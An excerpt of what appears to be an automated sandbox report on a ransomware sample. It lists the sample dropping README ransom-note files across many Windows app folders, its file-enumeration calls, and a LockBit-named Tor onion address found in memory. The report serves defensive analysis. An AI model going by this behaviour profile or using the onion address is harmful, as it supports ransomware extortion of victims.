            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\Flighting\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{fcc86364-ccd0-4b6b-bbd4-ed188fa53d71}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f0d0601b-1ca9-4fc2-a498-8f1b2c1353a6}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{bff69808-bf5a-45c4-83b2-159e16a88092}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{9a11bead-4a31-4027-b6a3-4965899ddc4e}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{94fd83ea-55f6-4a66-95d5-64315122fb92}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{844f5f98-087f-48ac-8c1f-1efdc9f3f424}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{6bd640a4-a5f3-4bd9-9f66-5a758203d37e}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{42e69a5f-f50b-4ab8-9366-0d7ecd1c46bc}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{21a92316-54d2-4b2e-bdf7-3d2e07db3b14}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0b11cf8d-da45-4b36-ad74-5b178b112358}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\TokenBroker\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\TokenBroker\Cache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\BackgroundTransferApi\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\MobilityExperience\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\MobilityExperience\ImageCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Features\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\onesettings_waas_featuremanagement\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353698\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353694\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314563\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280813\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280811\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280810\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0748C FindFirstFileExW,FindNextFileW,0_2_00D0748C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A064 FindFirstFileExW,FindClose,0_2_00D0A064
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D05C34 FindFirstFileW,FindClose,FindNextFileW,FindClose,0_2_00D05C34
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07560 FindFirstFileExW,FindClose,0_2_00D07560
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0F264 GetFileAttributesW,SetThreadPriority,FindFirstFileExW,FindNextFileW,FindClose,0_2_00D0F264
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0763C FindFirstFileExW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00D0763C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A440 GetLogicalDriveStringsW,0_2_00D0A440
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\Jump to behavior

            Networking

            barindex
            Found Tor onion address
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
